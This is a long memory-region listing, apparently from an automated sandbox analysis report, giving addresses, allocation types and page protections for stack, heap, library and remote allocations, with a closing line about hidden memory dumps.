||
|
6F41EBC000
|
stack
|
page read and write
|
||
|
EDA2BFF000
|
stack
|
page read and write
|
||
|
7FF64B560000
|
unkown
|
page readonly
|
||
|
1E270000
|
heap
|
page read and write
|
||
|
7FFAAC9D0000
|
trusted library allocation
|
page read and write
|
||
|
48D0000
|
trusted library allocation
|
page read and write
|
||
|
52BB87F000
|
stack
|
page read and write
|
||
|
7FF64B5BC000
|
unkown
|
page write copy
|
||
|
565B0FF000
|
stack
|
page read and write
|
||
|
2716A978000
|
heap
|
page read and write
|
||
|
7FFAAC8B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8CE000
|
heap
|
page read and write
|
||
|
7FF64B592000
|
unkown
|
page readonly
|
||
|
267FA000
|
stack
|
page read and write
|
||
|
1FF507F000
|
stack
|
page read and write
|
||
|
7FFAAC793000
|
trusted library allocation
|
page execute and read and write
|
||
|
17825B80000
|
heap
|
page read and write
|
||
|
18E018E0000
|
heap
|
page read and write
|
||
|
26E7E000
|
stack
|
page read and write
|
||
|
1EC81C41000
|
trusted library allocation
|
page read and write
|
||
|
3267F000
|
stack
|
page read and write
|
||
|
1FCCA14C000
|
heap
|
page read and write
|
||
|
7FFAAC79D000
|
trusted library allocation
|
page execute and read and write
|
||
|
19A26CD0000
|
heap
|
page read and write
|
||
|
1FCCC830000
|
heap
|
page read and write
|
||
|
7FFB1B6F0000
|
unkown
|
page readonly
|
||
|
7FFAAC794000
|
trusted library allocation
|
page read and write
|
||
|
7F280000
|
direct allocation
|
page read and write
|
||
|
7FFAAC950000
|
trusted library allocation
|
page execute and read and write
|
||
|
19A28683000
|
heap
|
page read and write
|
||
|
1EC81C5A000
|
trusted library allocation
|
page read and write
|
||
|
19A292D0000
|
heap
|
page read and write
|
||
|
478F000
|
stack
|
page read and write
|
||
|
29E0000
|
heap
|
page read and write
|
||
|
1D801BE0000
|
heap
|
page read and write
|
||
|
220093E0000
|
heap
|
page read and write
|
||
|
7FF64B5AF000
|
unkown
|
page read and write
|
||
|
7FF64B59D000
|
unkown
|
page read and write
|
||
|
25C6BC07000
|
heap
|
page read and write
|
||
|
1EC81D5F000
|
trusted library allocation
|
page read and write
|
||
|
266E3000
|
direct allocation
|
page read and write
|
||
|
7F30F000
|
direct allocation
|
page read and write
|
||
|
45F8000
|
direct allocation
|
page execute and read and write
|
||
|
6F41E3E000
|
stack
|
page read and write
|
||
|
7FF64B5AF000
|
unkown
|
page read and write
|
||
|
24837A24000
|
heap
|
page read and write
|
||
|
2296000
|
heap
|
page read and write
|
||
|
26A7F000
|
stack
|
page read and write
|
||
|
1EC81AE0000
|
heap
|
page read and write
|
||
|
26CFF000
|
stack
|
page read and write
|
||
|
454F000
|
stack
|
page read and write
|
||
|
25C6BC07000
|
heap
|
page read and write
|
||
|
16703B70000
|
heap
|
page read and write
|
||
|
1EC81A60000
|
heap
|
page read and write
|
||
|
7FF7E0A10000
|
unkown
|
page readonly
|
||
|
266B8000
|
direct allocation
|
page read and write
|
||
|
7FFAACA90000
|
trusted library allocation
|
page read and write
|
||
|
16703B7D000
|
heap
|
page read and write
|
||
|
7FF64B560000
|
unkown
|
page readonly
|
||
|
1EC81500000
|
trusted library allocation
|
page read and write
|
||
|
19A28AD0000
|
trusted library allocation
|
page read and write
|
||
|
19A26B38000
|
heap
|
page read and write
|
||
|
19D000
|
stack
|
page read and write
|
||
|
A7E000
|
stack
|
page read and write
|
||
|
7FF64B5BD000
|
unkown
|
page readonly
|
||
|
7EA60000
|
direct allocation
|
page read and write
|
||
|
7FD00000
|
direct allocation
|
page read and write
|
||
|
220090A0000
|
heap
|
page read and write
|
||
|
7FF64B561000
|
unkown
|
page execute read
|
||
|
7FF64B592000
|
unkown
|
page readonly
|
||
|
2851000
|
heap
|
page read and write
|
||
|
286F000
|
heap
|
page read and write
|
||
|
2ADD000
|
stack
|
page read and write
|
||
|
7FF64B592000
|
unkown
|
page readonly
|
||
|
27F8000
|
heap
|
page read and write
|
||
|
1EC81D6D000
|
trusted library allocation
|
page read and write
|
||
|
7FF64B5B9000
|
unkown
|
page readonly
|
||
|
23C3000
|
direct allocation
|
page read and write
|
||
|
27860000
|
trusted library allocation
|
page read and write
|
||
|
AFE000
|
stack
|
page read and write
|
||
|
7FF64B560000
|
unkown
|
page readonly
|
||
|
1FCCA2A3000
|
heap
|
page read and write
|
||
|
7FF64B592000
|
unkown
|
page readonly
|
||
|
2716ABA4000
|
heap
|
page read and write
|
||
|
25C6BDB0000
|
heap
|
page read and write
|
||
|
7F340000
|
direct allocation
|
page read and write
|
||
|
24837810000
|
heap
|
page read and write
|
||
|
95000
|
stack
|
page read and write
|
||
|
7FF64B592000
|
unkown
|
page readonly
|
||
|
26F7E000
|
stack
|
page read and write
|
||
|
450E000
|
stack
|
page read and write
|
||
|
4BE000
|
unkown
|
page execute and read and write
|
||
|
3A4CB7F000
|
stack
|
page read and write
|
||
|
7FF64B5BC000
|
unkown
|
page write copy
|
||
|
B17000
|
heap
|
page read and write
|
||
|
2190000
|
heap
|
page read and write
|
||
|
7FF6EF4B1000
|
unkown
|
page execute read
|
||
|
7FFAAC9A0000
|
trusted library allocation
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
7FF64B592000
|
unkown
|
page readonly
|
||
|
17825C4B000
|
heap
|
page read and write
|
||
|
6F4177E000
|
stack
|
page read and write
|
||
|
19A26B3E000
|
heap
|
page read and write
|
||
|
220091E0000
|
heap
|
page read and write
|
||
|
16703B7B000
|
heap
|
page read and write
|
||
|
2D41C650000
|
heap
|
page read and write
|
||
|
7FF64B5B9000
|
unkown
|
page readonly
|
||
|
7FF64B59D000
|
unkown
|
page write copy
|
||
|
7FF64B5AF000
|
unkown
|
page read and write
|
||
|
1E733D40000
|
heap
|
page read and write
|
||
|
9B000
|
stack
|
page read and write
|
||
|
7F40F000
|
direct allocation
|
page read and write
|
||
|
1ECFF9C9000
|
heap
|
page read and write
|
||
|
6C0000
|
heap
|
page read and write
|
||
|
A3D000
|
stack
|
page read and write
|
||
|
7FF64B561000
|
unkown
|
page execute read
|
||
|
4CC000
|
remote allocation
|
page execute and read and write
|
||
|
1E735723000
|
heap
|
page read and write
|
||
|
2F389050000
|
heap
|
page read and write
|
||
|
7FF64B5BC000
|
unkown
|
page write copy
|
||
|
7DF000
|
stack
|
page read and write
|
||
|
7FF64B560000
|
unkown
|
page readonly
|
||
|
19A26DCC000
|
heap
|
page read and write
|
||
|
7FF64B5B9000
|
unkown
|
page readonly
|
||
|
7EDEF000
|
direct allocation
|
page read and write
|
||
|
7FF64B561000
|
unkown
|
page execute read
|
||
|
D5823BE000
|
stack
|
page read and write
|
||
|
2FFF0000
|
heap
|
page read and write
|
||
|
2856000
|
heap
|
page read and write
|
||
|
2697E000
|
stack
|
page read and write
|
||
|
818000
|
heap
|
page read and write
|
||
|
559000
|
stack
|
page read and write
|
||
|
4CD000
|
unkown
|
page read and write
|
||
|
7F740000
|
direct allocation
|
page read and write
|
||
|
266D4000
|
direct allocation
|
page read and write
|
||
|
7EE90000
|
direct allocation
|
page read and write
|
||
|
7FFAAC960000
|
trusted library allocation
|
page execute and read and write
|
||
|
266DC000
|
direct allocation
|
page read and write
|
||
|
7FF64B59D000
|
unkown
|
page read and write
|
||
|
FCC7D0C000
|
stack
|
page read and write
|
||
|
16703AD0000
|
heap
|
page read and write
|
||
|
6F41B37000
|
stack
|
page read and write
|
||
|
1EC99C60000
|
heap
|
page read and write
|
||
|
25C6BBE8000
|
heap
|
page read and write
|
||
|
7FF64B5BD000
|
unkown
|
page readonly
|
||
|
26BBF000
|
stack
|
page read and write
|
||
|
63E000
|
stack
|
page read and write
|
||
|
7FF64B592000
|
unkown
|
page readonly
|
||
|
7FF64B5A1000
|
unkown
|
page read and write
|
||
|
17825C43000
|
heap
|
page read and write
|
||
|
2683E000
|
stack
|
page read and write
|
||
|
1E733C38000
|
heap
|
page read and write
|
||
|
7FF64B560000
|
unkown
|
page readonly
|
||
|
7FF64B592000
|
unkown
|
page readonly
|
||
|
283A000
|
heap
|
page read and write
|
||
|
1EC81A40000
|
heap
|
page execute and read and write
|
||
|
19E81210000
|
heap
|
page read and write
|
||
|
4B6000
|
unkown
|
page execute and read and write
|
||
|
6D0000
|
heap
|
page read and write
|
||
|
21257800000
|
heap
|
page read and write
|
||
|
7ED7F000
|
direct allocation
|
page read and write
|
||
|
1D801F60000
|
heap
|
page read and write
|
||
|
FCC81FE000
|
stack
|
page read and write
|
||
|
7E0000
|
direct allocation
|
page execute and read and write
|
||
|
7FCD8000
|
direct allocation
|
page read and write
|
||
|
1D801DD0000
|
heap
|
page read and write
|
||
|
1FCCC030000
|
trusted library allocation
|
page read and write
|
||
|
7FF64B5B4000
|
unkown
|
page read and write
|
||
|
2741F000
|
heap
|
page read and write
|
||
|
19E8121A000
|
heap
|
page read and write
|
||
|
17825C16000
|
heap
|
page read and write
|
||
|
16703AD4000
|
heap
|
page read and write
|
||
|
7FF64B5BC000
|
unkown
|
page write copy
|
||
|
1EC81D65000
|
trusted library allocation
|
page read and write
|
||
|
4A1000
|
remote allocation
|
page execute and read and write
|
||
|
18E01630000
|
heap
|
page read and write
|
||
|
1FCC9F30000
|
heap
|
page read and write
|
||
|
7FFAACA40000
|
trusted library allocation
|
page read and write
|
||
|
9B000
|
stack
|
page read and write
|
||
|
19A26B3B000
|
heap
|
page read and write
|
||
|
27760000
|
heap
|
page read and write
|
||
|
B80000
|
heap
|
page read and write
|
||
|
431276C000
|
stack
|
page read and write
|
||
|
18E000
|
stack
|
page read and write
|
||
|
23BC000
|
direct allocation
|
page read and write
|
||
|
4D3000
|
unkown
|
page execute and read and write
|
||
|
27F0000
|
heap
|
page read and write
|
||
|
16721E80000
|
heap
|
page read and write
|
||
|
7EDEF000
|
direct allocation
|
page read and write
|
||
|
7FDE0000
|
direct allocation
|
page read and write
|
||
|
2701E000
|
stack
|
page read and write
|
||
|
1EC99EF0000
|
heap
|
page read and write
|
||
|
418000
|
unkown
|
page execute and read and write
|
||
|
DAB62FE000
|
stack
|
page read and write
|
||
|
7FF64B59D000
|
unkown
|
page read and write
|
||
|
7FD70000
|
direct allocation
|
page read and write
|
||
|
25C6BC04000
|
heap
|
page read and write
|
||
|
7FFAAC850000
|
trusted library allocation
|
page execute and read and write
|
||
|
4584000
|
heap
|
page read and write
|
||
|
25C6BBE0000
|
heap
|
page read and write
|
||
|
27655000
|
heap
|
page read and write
|
||
|
7FF64B59D000
|
unkown
|
page write copy
|
||
|
25C6BF25000
|
heap
|
page read and write
|
||
|
220091A0000
|
heap
|
page read and write
|
||
|
7F568000
|
direct allocation
|
page read and write
|
||
|
7FF64B59D000
|
unkown
|
page read and write
|
||
|
7FF64B560000
|
unkown
|
page readonly
|
||
|
1ECFF99E000
|
heap
|
page read and write
|
||
|
17825C2B000
|
heap
|
page read and write
|
||
|
7EEC0000
|
direct allocation
|
page read and write
|
||
|
1EC82147000
|
trusted library allocation
|
page read and write
|
||
|
7F560000
|
direct allocation
|
page read and write
|
||
|
16703B92000
|
heap
|
page read and write
|
||
|
1D801E70000
|
heap
|
page read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
2F388DE0000
|
heap
|
page read and write
|
||
|
30140000
|
heap
|
page read and write
|
||
|
31DF4000
|
heap
|
page read and write
|
||
|
9E9A879000
|
stack
|
page read and write
|
||
|
7FF64B5B9000
|
unkown
|
page readonly
|
||
|
30223000
|
heap
|
page read and write
|
||
|
7FF64B5BD000
|
unkown
|
page readonly
|
||
|
19E81150000
|
heap
|
page read and write
|
||
|
7FF64B592000
|
unkown
|
page readonly
|
||
|
1EC81BA5000
|
heap
|
page read and write
|
||
|
1D801BD0000
|
heap
|
page read and write
|
||
|
4D6000
|
unkown
|
page readonly
|
||
|
7F62B000
|
direct allocation
|
page read and write
|
||
|
7EE10000
|
direct allocation
|
page read and write
|
||
|
52BB55B000
|
stack
|
page read and write
|
||
|
2D41C620000
|
heap
|
page read and write
|
||
|
26FD0000
|
remote allocation
|
page read and write
|
||
|
301FA000
|
heap
|
page read and write
|
||
|
7FF64B59D000
|
unkown
|
page read and write
|
||
|
7FF64B5A1000
|
unkown
|
page read and write
|
||
|
27761000
|
heap
|
page read and write
|
||
|
7FFAAC930000
|
trusted library allocation
|
page read and write
|
||
|
17825C43000
|
heap
|
page read and write
|
||
|
3293C000
|
stack
|
page read and write
|
||
|
1EC81C10000
|
heap
|
page execute and read and write
|
||
|
2F389000000
|
heap
|
page read and write
|
||
|
1FCCA010000
|
heap
|
page read and write
|
||
|
7FF64B5B9000
|
unkown
|
page readonly
|
||
|
7FF64B5AF000
|
unkown
|
page read and write
|
||
|
7FF64B560000
|
unkown
|
page readonly
|
||
|
7F440000
|
direct allocation
|
page read and write
|
||
|
7FF64B5A1000
|
unkown
|
page read and write
|
||
|
400000
|
unkown
|
page execute and read and write
|
||
|
27752000
|
heap
|
page read and write
|
||
|
7FF64B5B9000
|
unkown
|
page readonly
|
||
|
7FA000
|
heap
|
page read and write
|
||
|
492000
|
unkown
|
page execute and read and write
|
||
|
7FF64B561000
|
unkown
|
page execute read
|
||
|
7FF64B561000
|
unkown
|
page execute read
|
||
|
7FF64B59D000
|
unkown
|
page write copy
|
||
|
2716ABA0000
|
heap
|
page read and write
|
||
|
462000
|
unkown
|
page write copy
|
||
|
19A26B0A000
|
heap
|
page read and write
|
||
|
7FFB1B710000
|
unkown
|
page read and write
|
||
|
7FF64B561000
|
unkown
|
page execute read
|
||
|
7FF64B5B9000
|
unkown
|
page readonly
|
||
|
2A04000
|
heap
|
page read and write
|
||
|
565AEFD000
|
stack
|
page read and write
|
||
|
1D801C00000
|
heap
|
page read and write
|
||
|
7FF64B59D000
|
unkown
|
page read and write
|
||
|
870000
|
heap
|
page read and write
|
||
|
7FF6EF4BE000
|
unkown
|
page read and write
|
||
|
6F417FE000
|
stack
|
page read and write
|
||
|
1E733F00000
|
heap
|
page read and write
|
||
|
1E735720000
|
heap
|
page read and write
|
||
|
6F418FE000
|
stack
|
page read and write
|
||
|
19A26B06000
|
heap
|
page read and write
|
||
|
1FCCA35D000
|
heap
|
page read and write
|
||
|
7FF64B5BD000
|
unkown
|
page readonly
|
||
|
178283A0000
|
heap
|
page read and write
|
||
|
1E736460000
|
heap
|
page read and write
|
||
|
7F3D0000
|
direct allocation
|
page read and write
|
||
|
18E018E5000
|
heap
|
page read and write
|
||
|
2D41C690000
|
heap
|
page read and write
|
||
|
1EC81410000
|
heap
|
page read and write
|
||
|
2716A992000
|
heap
|
page read and write
|
||
|
31DF0000
|
heap
|
page read and write
|
||
|
301F0000
|
heap
|
page read and write
|
||
|
7F280000
|
direct allocation
|
page read and write
|
||
|
1EC81B6D000
|
heap
|
page read and write
|
||
|
266F1000
|
direct allocation
|
page read and write
|
||
|
52BB5DF000
|
stack
|
page read and write
|
||
|
1EC81CE0000
|
trusted library allocation
|
page read and write
|
||
|
1EC81D9E000
|
trusted library allocation
|
page read and write
|
||
|
910000
|
heap
|
page read and write
|
||
|
17825C48000
|
heap
|
page read and write
|
||
|
7EE90000
|
direct allocation
|
page read and write
|
||
|
FCC817C000
|
stack
|
page read and write
|
||
|
2FFF5000
|
heap
|
page read and write
|
||
|
6F41ABF000
|
stack
|
page read and write
|
||
|
19A26B1B000
|
heap
|
page read and write
|
||
|
1E733C46000
|
heap
|
page read and write
|
||
|
7EDA0000
|
direct allocation
|
page read and write
|
||
|
1EC81F66000
|
trusted library allocation
|
page read and write
|
||
|
1ECFF870000
|
heap
|
page read and write
|
||
|
7FD5F000
|
direct allocation
|
page read and write
|
||
|
7FF64B59D000
|
unkown
|
page read and write
|
||
|
7FF64B5AF000
|
unkown
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
827000
|
heap
|
page read and write
|
||
|
19A26B3B000
|
heap
|
page read and write
|
||
|
16722080000
|
heap
|
page read and write
|
||
|
1FCCA109000
|
heap
|
page read and write
|
||
|
1FCCA12B000
|
heap
|
page read and write
|
||
|
26FD0000
|
remote allocation
|
page read and write
|
||
|
1FCCA12B000
|
heap
|
page read and write
|
||
|
17825C08000
|
heap
|
page read and write
|
||
|
17825C1A000
|
heap
|
page read and write
|
||
|
7FF64B560000
|
unkown
|
page readonly
|
||
|
EDA2AFD000
|
stack
|
page read and write
|
||
|
266F8000
|
direct allocation
|
page read and write
|
||
|
9E9AA7D000
|
stack
|
page read and write
|
||
|
1EC81CD0000
|
trusted library allocation
|
page read and write
|
||
|
59C000
|
stack
|
page read and write
|
||
|
7FF64B560000
|
unkown
|
page readonly
|
||
|
2AE0000
|
heap
|
page read and write
|
||
|
283A000
|
heap
|
page read and write
|
||
|
327FE000
|
stack
|
page read and write
|
||
|
17825B60000
|
heap
|
page read and write
|
||
|
4AF000
|
unkown
|
page execute and read and write
|
||
|
7FF64B592000
|
unkown
|
page readonly
|
||
|
5C20000
|
trusted library allocation
|
page read and write
|
||
|
7FF64B5AF000
|
unkown
|
page read and write
|
||
|
23D8000
|
direct allocation
|
page read and write
|
||
|
19A26DC0000
|
heap
|
page read and write
|
||
|
26FD0000
|
remote allocation
|
page read and write
|
||
|
864000
|
heap
|
page read and write
|
||
|
16721F60000
|
heap
|
page read and write
|
||
|
304B0000
|
heap
|
page read and write
|
||
|
17825ECC000
|
heap
|
page read and write
|
||
|
52BB8FE000
|
stack
|
page read and write
|
||
|
7FF64B561000
|
unkown
|
page execute read
|
||
|
17825C2B000
|
heap
|
page read and write
|
||
|
19A26AF0000
|
heap
|
page read and write
|
||
|
6C54FE000
|
stack
|
page read and write
|
||
|
7FFAACA70000
|
trusted library allocation
|
page read and write
|
||
|
7FF64B561000
|
unkown
|
page execute read
|
||
|
1FCCA350000
|
heap
|
page read and write
|
||
|
7F3AF000
|
direct allocation
|
page read and write
|
||
|
7FF64B5B9000
|
unkown
|
page readonly
|
||
|
7FFAACAB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF64B5B9000
|
unkown
|
page readonly
|
||
|
9E9A48C000
|
stack
|
page read and write
|
||
|
2326000
|
direct allocation
|
page read and write
|
||
|
6F4197F000
|
stack
|
page read and write
|
||
|
1EC8216C000
|
trusted library allocation
|
page read and write
|
||
|
27651000
|
heap
|
page read and write
|
||
|
1EC81C17000
|
heap
|
page execute and read and write
|
||
|
1EC81470000
|
trusted library allocation
|
page read and write
|
||
|
499000
|
unkown
|
page execute and read and write
|
||
|
2D41C69A000
|
heap
|
page read and write
|
||
|
7FF64B59D000
|
unkown
|
page write copy
|
||
|
326BE000
|
stack
|
page read and write
|
||
|
7FFAAC9E0000
|
trusted library allocation
|
page read and write
|
||
|
282C000
|
heap
|
page read and write
|
||
|
7F5CE000
|
direct allocation
|
page read and write
|
||
|
3A4CA7B000
|
stack
|
page read and write
|
||
|
212578CA000
|
heap
|
page read and write
|
||
|
19A26B0A000
|
heap
|
page read and write
|
||
|
19A26B0A000
|
heap
|
page read and write
|
||
|
9E9A50E000
|
stack
|
page read and write
|
||
|
D58233E000
|
stack
|
page read and write
|
||
|
2715E000
|
stack
|
page read and write
|
||
|
7FB70000
|
direct allocation
|
page read and write
|
||
|
29DF000
|
direct allocation
|
page execute and read and write
|
||
|
18E018E4000
|
heap
|
page read and write
|
||
|
220093E4000
|
heap
|
page read and write
|
||
|
276AC000
|
heap
|
page read and write
|
||
|
7FF64B5B9000
|
unkown
|
page readonly
|
||
|
416000
|
unkown
|
page readonly
|
||
|
7FFB1B715000
|
unkown
|
page readonly
|
||
|
4B6000
|
remote allocation
|
page execute and read and write
|
||
|
ECA377C000
|
stack
|
page read and write
|
||
|
7FF6EF4BF000
|
unkown
|
page readonly
|
||
|
7FE000
|
heap
|
page read and write
|
||
|
1EC81450000
|
trusted library allocation
|
page read and write
|
||
|
1ECFFAE4000
|
heap
|
page read and write
|
||
|
4DA000
|
remote allocation
|
page execute and read and write
|
||
|
7FF6EF4B0000
|
unkown
|
page readonly
|
||
|
23D1000
|
direct allocation
|
page read and write
|
||
|
2390000
|
direct allocation
|
page read and write
|
||
|
2866000
|
heap
|
page read and write
|
||
|
1E733C30000
|
heap
|
page read and write
|
||
|
2290000
|
heap
|
page read and write
|
||
|
7FF64B561000
|
unkown
|
page execute read
|
||
|
2F388E38000
|
heap
|
page read and write
|
||
|
7FFAACA60000
|
trusted library allocation
|
page read and write
|
||
|
19A26B3B000
|
heap
|
page read and write
|
||
|
3A4CBFF000
|
stack
|
page read and write
|
||
|
1EC81D55000
|
trusted library allocation
|
page read and write
|
||
|
4BE000
|
remote allocation
|
page execute and read and write
|
||
|
474C000
|
stack
|
page read and write
|
||
|
7EAF0000
|
direct allocation
|
page read and write
|
||
|
6F41C3C000
|
stack
|
page read and write
|
||
|
6F41D3F000
|
stack
|
page read and write
|
||
|
7F518000
|
direct allocation
|
page read and write
|
||
|
7FFAACA30000
|
trusted library allocation
|
page read and write
|
||
|
1EC81B05000
|
heap
|
page read and write
|
||
|
1E733F04000
|
heap
|
page read and write
|
||
|
17827BA0000
|
trusted library allocation
|
page read and write
|
||
|
25C6BBC0000
|
heap
|
page read and write
|
||
|
7FF64B59D000
|
unkown
|
page write copy
|
||
|
1ECFF9A0000
|
heap
|
page read and write
|
||
|
7FF64B5A5000
|
unkown
|
page read and write
|
||
|
7FF64B560000
|
unkown
|
page readonly
|
||
|
7FF64B592000
|
unkown
|
page readonly
|
||
|
1FCCA134000
|
heap
|
page read and write
|
||
|
920000
|
heap
|
page read and write
|
||
|
7FF64B5BD000
|
unkown
|
page readonly
|
||
|
7FF64B5A1000
|
unkown
|
page read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
1ECFFA60000
|
heap
|
page read and write
|
||
|
7FF64B5B9000
|
unkown
|
page readonly
|
||
|
CB99BFE000
|
stack
|
page read and write
|
||
|
17825DD0000
|
heap
|
page read and write
|
||
|
17825E10000
|
heap
|
page read and write
|
||
|
7FF7E0A00000
|
unkown
|
page readonly
|
||
|
4312BFF000
|
stack
|
page read and write
|
||
|
266CD000
|
direct allocation
|
page read and write
|
||
|
25C6BDF0000
|
heap
|
page read and write
|
||
|
7FF64B5B9000
|
unkown
|
page readonly
|
||
|
1FCCA11A000
|
heap
|
page read and write
|
||
|
3247E000
|
stack
|
page read and write
|
||
|
1EC81D69000
|
trusted library allocation
|
page read and write
|
||
|
7FF64B59D000
|
unkown
|
page read and write
|
||
|
7FF64B59D000
|
unkown
|
page write copy
|
||
|
9E9A8FB000
|
stack
|
page read and write
|
||
|
16722150000
|
heap
|
page read and write
|
||
|
1EC81B09000
|
heap
|
page read and write
|
||
|
1ECFFAE0000
|
heap
|
page read and write
|
||
|
7FF64B561000
|
unkown
|
page execute read
|
||
|
1EC81FFB000
|
trusted library allocation
|
page read and write
|
||
|
B1B000
|
heap
|
page read and write
|
||
|
272FE000
|
heap
|
page read and write
|
||
|
266B0000
|
direct allocation
|
page read and write
|
||
|
17825C00000
|
heap
|
page read and write
|
||
|
266A9000
|
direct allocation
|
page read and write
|
||
|
1E733F0C000
|
heap
|
page read and write
|
||
|
8453FF000
|
stack
|
page read and write
|
||
|
18E01810000
|
heap
|
page read and write
|
||
|
7FF64B5BD000
|
unkown
|
page readonly
|
||
|
B10000
|
heap
|
page read and write
|
||
|
7FFAACA20000
|
trusted library allocation
|
page read and write
|
||
|
470000
|
unkown
|
page write copy
|
||
|
1E733C79000
|
heap
|
page read and write
|
||
|
6F41CBE000
|
stack
|
page read and write
|
||
|
278EE000
|
heap
|
page read and write
|
||
|
1EC82166000
|
trusted library allocation
|
page read and write
|
||
|
1FCCA116000
|
heap
|
page read and write
|
||
|
2D41C630000
|
heap
|
page read and write
|
||
|
7FFAACA10000
|
trusted library allocation
|
page read and write
|
||
|
7FF64B59D000
|
unkown
|
page write copy
|
||
|
7FFAAC94A000
|
trusted library allocation
|
page read and write
|
||
|
1EC81BAB000
|
heap
|
page read and write
|
||
|
7FF64B5B9000
|
unkown
|
page readonly
|
||
|
9E9A58E000
|
stack
|
page read and write
|
||
|
7FF64B561000
|
unkown
|
page execute read
|
||
|
27750000
|
trusted library allocation
|
page read and write
|
||
|
16703AB0000
|
heap
|
page read and write
|
||
|
2FF90000
|
heap
|
page read and write
|
||
|
7F0000
|
heap
|
page read and write
|
||
|
7FF64B5B9000
|
unkown
|
page readonly
|
||
|
ABE000
|
stack
|
page read and write
|
||
|
50D0000
|
heap
|
page read and write
|
||
|
7FF64B592000
|
unkown
|
page readonly
|
||
|
1E733EC0000
|
heap
|
page read and write
|
||
|
CB99AFE000
|
stack
|
page read and write
|
||
|
FCC7D8F000
|
stack
|
page read and write
|
||
|
7EC5F000
|
direct allocation
|
page read and write
|
There are 858 hidden memdumps, click here to show them.